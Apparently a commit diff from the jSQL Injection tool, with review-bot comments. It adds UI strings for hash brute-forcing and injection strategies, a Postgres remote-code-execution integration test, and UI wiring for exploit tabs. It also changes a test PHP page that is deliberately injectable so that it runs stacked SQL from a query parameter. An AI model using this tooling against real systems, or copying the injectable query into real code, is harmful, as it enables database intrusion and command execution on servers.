\ Password for admin pages and for database users are
\ usually hashed inside the database. BRUTEFORCE_HASH_TYPE_TOOLTIP = Type of hash
\ MD5 is commonly used to hash password of admin pages.
\ Password in MySQL is hashed differently (see table 'mysql.user'). BRUTEFORCE_LCASE_TOOLTIP = \ Lower case characters
\ Check if searched string contains any of following characters:
\ abcdefghijklmnopqrstuvwxyz BRUTEFORCE_UCASE_TOOLTIP = \ Upper case characters
\ Check if searched string contains any of following characters:
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ BRUTEFORCE_NUM_TOOLTIP = \ Numeric characters
\ Check if searched string contains any of following characters:
\ 0123456789 BRUTEFORCE_SPEC_TOOLTIP = \ Special characters
\ Check if searched string contains any of following characters:
\  ~`!@#$%^&*()_-+={}[]|\\;:'\"<.,>/? BRUTEFORCE_EXCLUDE_LABEL = Character(s) to exclude BRUTEFORCE_EXCLUDE_TOOLTIP = \ Exclude characters
\ Speed up process by excluding characters from the search. BRUTEFORCE_MIN_LABEL = Size min. BRUTEFORCE_MAX_LABEL = max. BRUTEFORCE_MIN_TOOLTIP = \ Minimum length of searched string
\ Speed up process by specifying the minimum length to search. BRUTEFORCE_MAX_TOOLTIP = \ Maximum length of searched string
\ Speed up process by specifying the maximum length to search. BRUTEFORCE_RUN_BUTTON_LABEL = Start BRUTEFORCE_RUN_BUTTON_TOOLTIP = \ Brute force provided hash to find original text
\ Hash the selected chars range and compare with provided BRUTEFORCE_RESULT = Result of brute force processing BRUTEFORCE_CHARACTER_RANGE = Select character range like lower case and numeric characters BRUTEFORCE_INCORRECT_MIN_MAX_LENGTH = Minimum length must be equal or lower than Maximum length BRUTEFORCE_STOP = Stop BRUTEFORCE_EMPTY_HASH = Missing hash BRUTEFORCE_CURRENT_STRING = Current string BRUTEFORCE_CURRENT_HASH = Current hash BRUTEFORCE_POSSIBILITIES = Number of possibilities BRUTEFORCE_CHECKED_HASHES = Checked hashes BRUTEFORCE_ESTIMATED = Estimated hashes left BRUTEFORCE_PERSECOND = Per second BRUTEFORCE_TRAVERSING_REMAINING = Traversing remaining BRUTEFORCE_DAYS = days BRUTEFORCE_HOURS = h BRUTEFORCE_MINUTES = min BRUTEFORCE_SECONDS = s BRUTEFORCE_PERCENT_DONE = Percent done BRUTEFORCE_ABORTED = Brute force aborted BRUTEFORCE_FOUND_HASH = Hash found BRUTEFORCE_HASH_NOT_FOUND = Hash not found # CODER CODER_TAB = Encoding CODER_TOOLTIP = Encode or decode a string CODER_INPUT = Type a text to convert CODER_RESULT = Result of conversion # SCAN SCANLIST_TAB = Batch scan SCANLIST_TOOLTIP = Test injection on multiple targets SCAN_RUN_BUTTON_STOP = Stop SCAN_RUN_BUTTON_LABEL = Start SCAN_RUN_BUTTON_TOOLTIP = Scan common public URL for injection # ADDRESSBAR FIELD_QUERYSTRING_TOOLTIP = \ Server URL
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside path or params (e.g. path?inject=*&q=).\
\ NTLM and Negotiate Authentication (NTLM is also set in Preferences)
\ Set NTLM and Negotiate authentication in URL.
\ E.g. http://domain\\user:pass@127.0.0.1/path?q=\ FIELD_REQUEST_TOOLTIP = \ Request parameters
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. inject=*&q=).\ FIELD_HEADER_TOOLTIP = \ Header parameters like Cookie, User-Agent and Referer
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. Inject:*\\r\\nQ:).
\ Set cookies with Cookie: key1=value1;key2=.
\ Define Basic authent with user:pass encoded in base64.
\ E.g. user:pass => dXNlcjpwYXNz, set Authorization: Basic dXNlcjpwYXNz\ METHOD_QUERYSTRING_TOOLTIP = Inject using URL parameters METHOD_REQUEST_TOOLTIP = Inject using Request parameters METHOD_HEADER_TOOLTIP = Inject using Header parameters METHOD_CUSTOM_TOOLTIP = Set user defined HTTP method.
\ A valid method is limited to chars:
\ !#$%&'*+-.^_`|~0123456789
\ abcdefghijklmnopqrstuvwxyz
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ\ BUTTON_START_TOOLTIP = Start injection BUTTON_STOP_TOOLTIP = Stop injection BUTTON_STOPPING_TOOLTIP = Stopping... BUTTON_ADVANCED = Advanced DIALOG_NEW_INJECTION_TITLE = New injection DIALOG_NEW_INJECTION_TEXT = Start a new injection? STRATEGY_TIME_TOOLTIP = \ Slowest and least reliable method
\ Create 5s delay when query statement is false.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_BLIND_TOOLTIP = \ Slow and reliable method
\ Create response A when query statement is true, response B otherwise.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_MULTIBIT_TOOLTIP = \ Slow and reliable method 3 times faster than Blind
\ Require 8 pages mapped to distinct id.
\ Read multiple bits for each character's ASCII code (3 URL calls). STRATEGY_ERROR_TOOLTIP = \ Fast and accurate method
\ Read data directly from source page. STRATEGY_STACK_TOOLTIP = \ Fastest and accurate method though less common
\ Read large data directly from source page. STRATEGY_UNION_TOOLTIP = \ Fastest and accurate method
\ Read large data directly from source page. # MENUBAR MENUBAR_COMMUNITY = Community MENUBAR_COMMUNITY_REPORTISSUE = Report issue or bug MENUBAR_COMMUNITY_HELPTRANSLATE = I help translate jSQL into MENUBAR_COMMUNITY_ANOTHERLANGUAGE = another language... MENUBAR_HELP = Help MENUBAR_HELP_UPDATE = Check for Updates MENUBAR_HELP_ABOUT = About jSQL Injection MENUBAR_APPEARANCE = Appearance MENUBAR_THEMES = Themes MENUBAR_WINDOWS = Windows MENUBAR_LANGUAGE = Language MENUBAR_SQL_ENGINE = SQL Engine MENUBAR_VIEW = Show View MENUBAR_PANEL = Show Consoles MENUBAR_PREFERENCES = Preferences MENUBAR_EDIT = Edit MENUBAR_FILE = File MENUBAR_FILE_EXIT = Exit MENUBAR_FILE_SAVETABAS = Save Tab As... SAVE_TAB_CONFIRM_TITLE = Confirm Save As SAVE_TAB_CONFIRM_LABEL = already exists.\nDo you want to replace it ? TRANSLATION_TEXT = Contribute and translate parts of jSQL Injection into %s
\ Help the community and translate some buttons, menus, tabs and tooltips into %s,\ then click on Send to forward your changes to the developer on GitHub.
",\ E.g. for French, change CONTEXT_MENU_COPY = Copy to CONTEXT_MENU_COPY = Copier,\ then click on Send. The list only displays what needs to be translated \ and is updated as soon as the developer processes your request.\ TRANSLATION_SEND = Send TRANSLATION_TITLE = Translate to TRANSLATION_PLACEHOLDER = Text remaining to translate TRANSLATION_PROGRESS = translated into # CONSOLE CONSOLE_MAIN_LABEL = Console CONSOLE_MAIN_TOOLTIP = General information CONSOLE_CHUNK_LABEL = Chunk CONSOLE_CHUNK_TOOLTIP = Raw data extracted CONSOLE_BINARY_LABEL = Binary CONSOLE_BINARY_TOOLTIP = Blind/Time chars extracted CONSOLE_NETWORK_LABEL = Network CONSOLE_NETWORK_TOOLTIP = URL calls logs CONSOLE_JAVA_LABEL = Java CONSOLE_JAVA_TOOLTIP = Java thrown exception NETWORK_TAB_URL_LABEL = URL NETWORK_TAB_HEADERS_LABEL = Headers NETWORK_TAB_PARAMS_LABEL = Request NETWORK_TAB_RESPONSE_LABEL = Response NETWORK_TAB_SOURCE_LABEL = Source NETWORK_TAB_PREVIEW_LABEL = Preview NETWORK_LINE_PLACEHOLDER_URL = Request URL NETWORK_LINE_PLACEHOLDER_HEADERS = Request headers NETWORK_LINE_PLACEHOLDER_REQUEST = Request body NETWORK_LINE_PLACEHOLDER_RESPONSE = Response headers NETWORK_LINE_PLACEHOLDER_SOURCE = Page source NETWORK_LINE_PLACEHOLDER_PREVIEW = Page rendering NETWORK_TAB_URL_COLUMN = URL NETWORK_TAB_SIZE_COLUMN = Size # LOGGER LOG_START_INJECTION = Starting new injection LOG_CONNECTION_TEST = Connection test... LOG_USING_INSERTION_CHARACTER = Using character insertion LOG_USING_DATABASE_TYPE = Using LOG_DATABASE_TYPE_FORCED_BY_USER = Database forced to LOG_DATABASE_TYPE_NOT_FOUND = Database unknown, forcing to LOG_VULNERABLE = Vulnerable to LOG_CHECKING_STRATEGY = Checking strategy LOG_CHECKING = Checking LOG_USING_STRATEGY = Using strategy LOG_FETCHING_INFORMATIONS = Fetching metadata... LOG_FETCHING_DATABASES = Fetching databases... 
LOG_DONE = Done LOG_DB_METADATA_INCORRECT = Incorrect or incomplete data LOG_DB_METADATA_WARN = Processing but failure is expected LOG_LIST_VALUES_INCOMPLETE = Incomplete row found LOG_LIST_VALUES_TOO_LONG = Row too long at # LOG_ADMIN_UNKNOWN_PROTOCOL = Unknown URL protocol LOG_ADMIN_NO_PROTOCOL = Undefined URL protocol, forcing to [http://] LOG_I18N_TEXT_NOT_FOUND = Language file not found, text to translate loaded from local LOG_IP_ADDRESS_CHECK = Checking ip address... LOG_IP_ADDRESS_IS = Your public IP address is # LIST LIST_NEW_VALUE = New Value(s)... LIST_CUT = Cut LIST_PASTE = Paste LIST_DELETE = Delete LIST_RESTORE_DEFAULT = Restore default LIST_ADD_VALUE_OK = Ok LIST_ADD_VALUE_CANCEL = Cancel LIST_ADD_VALUE_TITLE = Add Value(s) LIST_ADD_VALUE_LABEL = Add new value(s) to the list, a value per line.
Or you can copy/paste directly from your clipboard to the list. LIST_EXPORT_TITLE = Export... LIST_EXPORT_CONFIRM_LABEL = already exists.\nDo you want to replace it? LIST_EXPORT_CONFIRM_TITLE = Confirm Export LIST_IMPORT_CONFIRM_REPLACE = Replace LIST_IMPORT_CONFIRM_ADD = Add LIST_IMPORT_CONFIRM_LABEL = Replace list or add to current location? LIST_IMPORT_CONFIRM_TITLE = Import... LIST_IMPORT_ERROR_TITLE = Import Error LIST_IMPORT_ERROR_LABEL = Unsupported file format, use text file only # SQLENGINE SQLENGINE_STANDARD = Default SQLENGINE_ZIP = Zip SQLENGINE_DIOS = Dios SQLENGINE_STRUCTURE = Structure SQLENGINE_DATABASES = Database SQLENGINE_TABLES = Tables SQLENGINE_COLUMNS = Columns SQLENGINE_ROWS = Rows SQLENGINE_FIELD = Field SQLENGINE_FIELDS_SEPARATOR = Fields Separator SQLENGINE_METADATA = Metadata SQLENGINE_STRATEGY = Strategy SQLENGINE_STACK = Stack SQLENGINE_UNION = Union SQLENGINE_ERROR = Error SQLENGINE_BOOLEAN = Binary SQLENGINE_FINGERPRINTING = Fingerprint SQLENGINE_CONFIGURATION = Configuration SQLENGINE_ORDER_BY = Order by SQLENGINE_CHARACTERS_SLIDINGWINDOW = Char Sliding Window SQLENGINE_ROWS_SLIDINGWINDOW = Rows Sliding Window SQLENGINE_CAPACITY = Capacity SQLENGINE_CALIBRATOR = Calibrator SQLENGINE_FAILSAFE = Failsafe SQLENGINE_END_COMMENT = End comment SQLENGINE_LIMIT_START_INDEX = Limit start index SQLENGINE_FILE = File # OTHER UPDATE_EXCEPTION = \ An error occurred while checking updates, download the latest version from official website:\n\ https://github.com/ron190/jsql-injection/releases UPDATE_NEW_VERSION = A new version of jSQL Injection is available at https://github.com/ron190/jsql-injection/releases UPDATE_UPTODATE = jSQL Injection is up-to-date UPDATE_LOADING = Checking updates... 
ABOUT_WINDOW_TITLE = About ABOUT_WEBPAGE = Webpage ABOUT_CLOSE = Close PREFERENCES_PROXY = Proxy PREFERENCES_USEPROXY = Use a proxy PREFERENCES_PROXYADDRESS = Proxy address PREFERENCES_PROXYPORT = Proxy port PREFERENCES_AUTHENT = Authentication PREFERENCES_AUTHENT_USER = Username PREFERENCES_AUTHENT_PASS = Password PREFERENCES_CHECKUPDATE = Check update at startup PREFERENCES_REPORT_EXCEPTIONS = Report unhandled exceptions PREFERENCES_FOLLOW_REDIRECTIONS = Follow HTTP redirections PREFERENCES_CHECKIP = Check your IP PREFERENCES_APPLY = Apply \ No newline at end of file diff --git a/model/src/test/java/com/test/AbstractTestSuite.java b/model/src/test/java/com/test/AbstractTestSuite.java index cc77bb975e..08b61fba5f 100644 --- a/model/src/test/java/com/test/AbstractTestSuite.java +++ b/model/src/test/java/com/test/AbstractTestSuite.java @@ -4,7 +4,6 @@ import com.jsql.model.bean.database.Column; import com.jsql.model.bean.database.Database; import com.jsql.model.bean.database.Table; -import com.jsql.model.exception.InjectionFailureException; import com.jsql.model.exception.JSqlException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java b/model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java new file mode 100644 index 0000000000..bbb71a1fc3 --- /dev/null +++ b/model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java 
@@ -0,0 +1,47 @@
+package com.test.vendor.postgres;
+
+import com.jsql.model.InjectionModel;
+import com.jsql.model.accessible.ExploitMethod;
+import com.jsql.model.exception.JSqlException;
+import com.jsql.view.terminal.SystemOutTerminal;
+import org.junit.jupiter.api.Assertions;
+import org.junitpioneer.jupiter.RetryingTest;
+
+import java.util.UUID;
+
+public class PostgresExploitRceSuiteIT extends ConcretePostgresSuiteIT {
+
+ @Override
+ public void setupInjection() throws Exception {
+ InjectionModel model = new InjectionModel();
+ this.injectionModel = model;
+
+ model.subscribe(new SystemOutTerminal());
+
+ model.getMediatorUtils().getParameterUtil().initQueryString(
+ "http://jsql-lamp:8079/php/get-pg.php?id="
+ );
+
+ model
+ .getMediatorUtils()
+ .getPreferencesUtil()
+ .withIsStrategyBlindDisabled(true)
+ .withIsStrategyTimeDisabled(true);
+
+ model
+ .getMediatorUtils()
+ .getConnectionUtil()
+ .withMethodInjection(model.getMediatorMethod().getQuery())
+ .withTypeRequest("GET");
+
+ model.beginInjection();
+ }
+
+ @RetryingTest(3)
+ public void exploitUdfAuto() throws JSqlException {
+ this.injectionModel.getUdfAccess().createExploitRcePostgres(ExploitMethod.AUTO);
+ String resultCommand = this.injectionModel.getUdfAccess().runCommandRcePostgres("uname", UUID.randomUUID());
+ LOGGER.info("rce: found {}, to find {}", resultCommand.trim(), "Linux");
+ Assertions.assertTrue(resultCommand.trim().contains("Linux"));
+ }
+}
diff --git a/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java b/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java
index ab73747d62..92c1d3d58f 100644
--- a/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java
+++ b/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java
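Review bot: The test method in PostgresExploitRceSuiteIT is named `exploitUdfAuto`, but its body calls `createExploitRcePostgres` and `runCommandRcePostgres`, so a failure report points at the wrong feature; `exploitRceAuto` would match the class name. The closing `Assertions.assertTrue(resultCommand.trim().contains("Linux"))` fails without saying what the command returned; `Assertions.assertTrue(resultCommand.trim().contains("Linux"), "unexpected command output: " + resultCommand);` puts the diagnosis in the test report instead of only in the log line above it. Nothing in the test removes whatever `createExploitRcePostgres` installs in the database (its body is not in this hunk), so suites that share the jsql-lamp container presumably run against a modified server afterwards; worth confirming that this is intended.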
@@ -43,7 +43,7 @@ public void setupInjection() throws Exception { } @RetryingTest(3) - public void exploitWebAuto() throws JSqlException { + public void exploitWebAuto() { var urlSuccess = this.injectionModel.getResourceAccess().createExploitWebSqlite("/var/www/html/", StringUtils.EMPTY); String resultCommand = this.injectionModel.getResourceAccess().runWebShell( "uname", diff --git a/model/src/test/resources/docker/Dockerfile.lamp b/model/src/test/resources/docker/Dockerfile.lamp index a27d83a448..96586a0099 100644 --- a/model/src/test/resources/docker/Dockerfile.lamp +++ b/model/src/test/resources/docker/Dockerfile.lamp @@ -2,12 +2,11 @@ FROM ubuntu:18.04 ENV MYSQL_ROOT_PASSWORD password ENV POSTGRES_USER postgres ENV POSTGRES_PASSWORD postgres -RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y dos2unix php php-mysql libapache2-mod-php mysql-server postgresql php-pgsql php-sqlite3 +RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y dos2unix php php-mysql libapache2-mod-php mysql-server postgresql php-pgsql php-sqlite3 postgresql-plpython3 EXPOSE 8079 3308 6000 COPY ./lamp/ /var/www/html/ RUN chmod 777 /var/www/html/ -# required by sqlite write shell -RUN chmod 777 /var/www/html/php/ +RUN chmod 777 /var/www/html/php/ # required by sqlite write shell RUN chmod +x /var/www/html/start-script.sh RUN dos2unix /var/www/html/start-script.sh ENTRYPOINT ["/var/www/html/start-script.sh"] \ No newline at end of file diff --git a/model/src/test/resources/docker/lamp/php/get-pg.php b/model/src/test/resources/docker/lamp/php/get-pg.php index c603c82534..58368ca521 100644 --- a/model/src/test/resources/docker/lamp/php/get-pg.php +++ b/model/src/test/resources/docker/lamp/php/get-pg.php @@ -1,6 +1,9 @@ query("SELECT '1' FROM (select 1)x where '1'={$_GET['id']}") as $row) { - echo "
  • " . join(',', $row) . "
  • "; +$array = explode(";", "SELECT '1' FROM (select 1)x where '1'={$_GET['id']}"); +foreach ($array as $item) { + foreach($db->query($item) as $row) { + echo "
  • " . join(',', $row) . "
  • "; + } } \ No newline at end of file diff --git a/model/src/test/resources/docker/lamp/start-script.sh b/model/src/test/resources/docker/lamp/start-script.sh index 9c0ad72092..6a636e9531 100644 --- a/model/src/test/resources/docker/lamp/start-script.sh +++ b/model/src/test/resources/docker/lamp/start-script.sh @@ -29,7 +29,5 @@ su postgres -c ' ' echo "Listen 8079" >> /etc/apache2/ports.conf -sed -i 's/^;extension=sqlite3/extension=sqlite3/' /etc/php/7.2/apache2/php.ini -sed -i 's/^;extension=sqlite3/extension=sqlite3/' /etc/php/7.2/cli/php.ini - +sed -i 's/^;extension=sqlite3/extension=sqlite3/' /etc/php/7.2/cli/php.ini /etc/php/7.2/apache2/php.ini apache2ctl -D FOREGROUND \ No newline at end of file diff --git a/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java b/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java index 9a00eb5718..be6df2a6ac 100644 --- a/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java +++ b/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java 
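Review bot: The new `explode(";", ...)` in get-pg.php splits on every semicolon, including ones inside quoted strings, and a trailing `;` produces an empty fragment; each fragment is then passed to `$db->query($item)` and iterated without checking the result. If `$db` is a PDO handle in its default error mode (the connection setup is outside this hunk), `query()` returns `false` for a failed or empty fragment and the inner `foreach` emits a warning into the page that the tests parse. Guarding the loop with `$result = trim($item) === '' ? false : $db->query($item);` followed by `if ($result === false) { continue; }` keeps the output stable. Because this change deliberately enables stacked statements on an injectable parameter, a header comment such as `// Intentionally vulnerable test fixture: executes stacked statements from $_GET['id']; never deploy outside the test container` would make that explicit for anyone reusing the image.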
@@ -43,14 +43,14 @@ public ActionSaveTab() { // Unhandled NoSuchMethodError #82561 on constructor: NoSuchMethodError // Unhandled InternalError #93015 on constructor: InvocationTargetException // Unhandled NullPointerException #95805 on constructor: desktop null on Windows + // Unhandled IllegalArgumentException #95985 on constructor: Comparison method violates its general contract! try { this.replaceFileChooser = new ReplaceFileChooser( MediatorHelper.model().getMediatorUtils().getPreferencesUtil().getPathFile() ); - } catch (NoSuchMethodError | InternalError | NullPointerException e) { - LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Internal error in JFileChooser: {}", e.getMessage()); - LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Please verify your system and the error stacktrace in tab Java"); - LOGGER.log(LogLevelUtil.CONSOLE_JAVA, "Internal error", e); + } catch (IllegalArgumentException | NoSuchMethodError | InternalError | NullPointerException e) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Internal error in JFileChooser, verify your system and see stacktrace in tab Java: {}", e.getMessage()); + LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e); } this.putValue(Action.ACCELERATOR_KEY, KeyStroke.getKeyStroke(KeyEvent.VK_S, InputEvent.CTRL_DOWN_MASK)); this.putValue(Action.MNEMONIC_KEY, KeyEvent.VK_S); diff --git a/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java b/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java index 6990f23ee4..b184a166ed 100644 --- a/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java +++ b/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java 
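Review bot: The rewritten `LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e);` passes the exception as the message object instead of as the throwable argument that the removed `LOGGER.log(LogLevelUtil.CONSOLE_JAVA, "Internal error", e)` used, so whether the stack trace still reaches the Java tab depends on how the logging backend treats a throwable message; keeping the explicit form, `LOGGER.log(LogLevelUtil.CONSOLE_JAVA, "Internal error in JFileChooser", e);`, removes the doubt. Separately, `replaceFileChooser` is assigned only inside the `try`, so after any of the four caught types, including the newly added `IllegalArgumentException`, the field stays unset. The rest of the constructor and the code that uses the field are outside this hunk, so it is worth confirming that the save action copes with a missing chooser rather than failing later with a less informative error.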
@@ -29,7 +29,7 @@ public enum Language { TA("Tamil", "ta", UiUtil.ICON_FLAG_LK), SE("Swedish", "se", UiUtil.ICON_FLAG_SE), FI("Finnish", "fi", UiUtil.ICON_FLAG_FI), - OT("another language", "unknown", null); + OT("another language", "unknown", new ImageIcon()); private final String nameEnglish; // required for default logging and english modal translate into private final ImageIcon flag; diff --git a/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRce.java b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRceOracle.java similarity index 82% rename from view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRce.java rename to view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRceOracle.java index 182791166f..9cc12e884c 100644 --- a/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRce.java +++ b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRceOracle.java @@ -18,17 +18,17 @@ /** * Create a new tab for the terminal. */ -public class AddTabExploitRce extends CreateTabHelper implements InteractionCommand { +public class AddTabExploitRceOracle extends CreateTabHelper implements InteractionCommand { /** * @param interactionParams The local path and url for the shell */ - public AddTabExploitRce(Object[] interactionParams) { + public AddTabExploitRceOracle(Object[] interactionParams) { // nothing } @Override public void execute() { - SwingUtilities.invokeLater(() -> MediatorHelper.tabResults().addTabExploitRce()); + SwingUtilities.invokeLater(() -> MediatorHelper.tabResults().addTabExploitRceOracle()); } } diff --git a/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java new file mode 100644 index 0000000000..42735deb82 --- /dev/null +++ b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java 
@@ -0,0 +1,34 @@
+/*******************************************************************************
+ * Copyhacked (H) 2012-2025.
+ * This program and the accompanying materials
+ * are made available under no term at all, use it like
+ * you want, but share and discuss it
+ * every time possible with every body.
+ *
+ * Contributors:
+ * ron190 at ymail dot com - initial implementation
+ ******************************************************************************/
+package com.jsql.view.swing.interaction;
+
+import com.jsql.view.interaction.InteractionCommand;
+import com.jsql.view.swing.util.MediatorHelper;
+
+import javax.swing.*;
+
+/**
+ * Create a new tab for the terminal.
+ */
+public class AddTabExploitRcePostgres extends CreateTabHelper implements InteractionCommand {
+
+ /**
+ * @param interactionParams The local path and url for the shell
+ */
+ public AddTabExploitRcePostgres(Object[] interactionParams) {
+ // nothing
+ }
+
+ @Override
+ public void execute() {
+ SwingUtilities.invokeLater(() -> MediatorHelper.tabResults().addTabExploitRcePostgres());
+ }
+}
diff --git a/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java b/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java
index f45b41b7a1..45e2d7cd16 100644
--- a/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java
+++ b/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java
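Review bot: The constructor Javadoc in AddTabExploitRcePostgres, `@param interactionParams The local path and url for the shell`, does not describe this class: the constructor body is only `// nothing` and `execute()` opens the tab without using any path or URL. I would document the parameter as unused, e.g. `@param interactionParams Ignored; kept so every InteractionCommand has the same constructor shape` (assuming that is why it exists), and make the class comment specific, e.g. `Create a new tab hosting the Postgres RCE terminal.` The wildcard `import javax.swing.*;` is needed only for `SwingUtilities` and could be `import javax.swing.SwingUtilities;`.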
@@ -53,17 +53,19 @@ public class ManagerExploit extends AbstractManagerList { private final AtomicReference netshare = new AtomicReference<>(); protected final JTextField textfieldUrlShell; - public static final String EXPLOIT_UDF = "EXPLOIT_UDF"; + public static final String EXPLOIT_RCE_ORACLE = "EXPLOIT_RCE_ORACLE"; + public static final String EXPLOIT_RCE_POSTGRES = "EXPLOIT_RCE_POSTGRES"; + public static final String EXPLOIT_UDF_MYSQL = "EXPLOIT_UDF_MYSQL"; public static final String EXPLOIT_WEB_MYSQL = "EXPLOIT_WEB_MYSQL"; public static final String EXPLOIT_WEB_SQLITE = "EXPLOIT_WEB_SQLITE"; public static final String EXPLOIT_SQL_MYSQL = "EXPLOIT_SQL_MYSQL"; public static final String EXPLOIT_UPLOAD_MYSQL = "EXPLOIT_UPLOAD_MYSQL"; public static final String EXPLOIT_UPLOAD_SQLITE = "EXPLOIT_UPLOAD_SQLITE"; - public static final String EXPLOIT_RCE = "EXPLOIT_RCE"; private final JComboBox comboBoxExploitTypes = new JComboBox<>(new Object[]{ - new ModelItemType(ManagerExploit.EXPLOIT_UDF, "EXPLOIT_UDF_TOOLTIP"), - new ModelItemType(ManagerExploit.EXPLOIT_RCE, "EXPLOIT_RCE_TOOLTIP"), + new ModelItemType(ManagerExploit.EXPLOIT_UDF_MYSQL, "EXPLOIT_UDF_MYSQL_TOOLTIP"), + new ModelItemType(ManagerExploit.EXPLOIT_RCE_ORACLE, "EXPLOIT_RCE_ORACLE_TOOLTIP"), + new ModelItemType(ManagerExploit.EXPLOIT_RCE_POSTGRES, "EXPLOIT_RCE_POSTGRES_TOOLTIP"), ComboBoxMethodRenderer.SEPARATOR, new ModelItemType(ManagerExploit.EXPLOIT_WEB_MYSQL, "EXPLOIT_WEB_MYSQL_TOOLTIP"), new ModelItemType(ManagerExploit.EXPLOIT_SQL_MYSQL, "EXPLOIT_SQL_MYSQL_TOOLTIP"), 
@@ -151,7 +153,11 @@ public JToolTip createToolTip() { Arrays.asList(this.username.get(), this.password.get(), this.scrollListPaths, this.textfieldUrlShell) .forEach(component -> component.setVisible(false)); ModelItemType selectedItem = (ModelItemType) e.getItem(); - if (!Arrays.asList(ManagerExploit.EXPLOIT_UDF, ManagerExploit.EXPLOIT_RCE).contains(selectedItem.getKeyLabel())) { + if (!Arrays.asList( + ManagerExploit.EXPLOIT_UDF_MYSQL, + ManagerExploit.EXPLOIT_RCE_POSTGRES, + ManagerExploit.EXPLOIT_RCE_ORACLE + ).contains(selectedItem.getKeyLabel())) { this.scrollListPaths.setVisible(true); this.textfieldUrlShell.setVisible(true); if (ManagerExploit.EXPLOIT_SQL_MYSQL.equals(selectedItem.getKeyLabel())) { @@ -235,10 +241,14 @@ public ActionExploit(JComboBox comboBoxExploitTypes) { public void actionPerformed(ActionEvent evt) { var modelSelectItem = (ModelItemType) this.comboBoxExploitTypes.getSelectedItem(); var labelSelectItem = Objects.requireNonNull(modelSelectItem).getKeyLabel(); - if (Arrays.asList(ManagerExploit.EXPLOIT_UDF, ManagerExploit.EXPLOIT_RCE).contains(labelSelectItem)) { + if (Arrays.asList( + ManagerExploit.EXPLOIT_UDF_MYSQL, + ManagerExploit.EXPLOIT_RCE_POSTGRES, + ManagerExploit.EXPLOIT_RCE_ORACLE + ).contains(labelSelectItem)) { new SwingWorker<>() { @Override - protected Object doInBackground() { Thread.currentThread().setName("SwingWorkerExploitUdf"); + protected Object doInBackground() { Thread.currentThread().setName("SwingWorkerExploit"); ActionExploit.this.start(null, null, null); return null; } 
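Review bot: The list `Arrays.asList(ManagerExploit.EXPLOIT_UDF_MYSQL, ManagerExploit.EXPLOIT_RCE_POSTGRES, ManagerExploit.EXPLOIT_RCE_ORACLE)` is now built twice, once in the item listener (`@@ -151`) and again in `actionPerformed` (`@@ -235`), so the next exploit type has to be added in both places to keep the visible form fields and the launched action in step. A single constant referenced from both checks, e.g. `private static final List<String> EXPLOITS_WITHOUT_PATH = List.of(EXPLOIT_UDF_MYSQL, EXPLOIT_RCE_ORACLE, EXPLOIT_RCE_POSTGRES);` (with `java.util.List` imported), avoids that drift. Both enclosing methods start and end outside the hunks shown.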
@@ -257,7 +267,7 @@ public void actionPerformed(ActionEvent evt) { } if ( Arrays.asList( - ManagerExploit.EXPLOIT_SQL_MYSQL, ManagerExploit.EXPLOIT_UPLOAD_MYSQL, ManagerExploit.EXPLOIT_WEB_MYSQL, ManagerExploit.EXPLOIT_UDF + ManagerExploit.EXPLOIT_SQL_MYSQL, ManagerExploit.EXPLOIT_UPLOAD_MYSQL, ManagerExploit.EXPLOIT_WEB_MYSQL, ManagerExploit.EXPLOIT_UDF_MYSQL ).contains(labelSelectItem) && MediatorHelper.model().getMediatorVendor().getVendor() != MediatorHelper.model().getMediatorVendor().getMysql() ) { @@ -270,7 +280,13 @@ public void actionPerformed(ActionEvent evt) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Unsupported for [{}], choose a SQLite target instead", MediatorHelper.model().getMediatorVendor().getVendor()); return; } else if ( - ManagerExploit.EXPLOIT_RCE.equals(labelSelectItem) + ManagerExploit.EXPLOIT_RCE_POSTGRES.equals(labelSelectItem) + && MediatorHelper.model().getMediatorVendor().getVendor() != MediatorHelper.model().getMediatorVendor().getPostgres() + ) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Unsupported for [{}], choose a Postgres target instead", MediatorHelper.model().getMediatorVendor().getVendor()); + return; + } else if ( + ManagerExploit.EXPLOIT_RCE_ORACLE.equals(labelSelectItem) 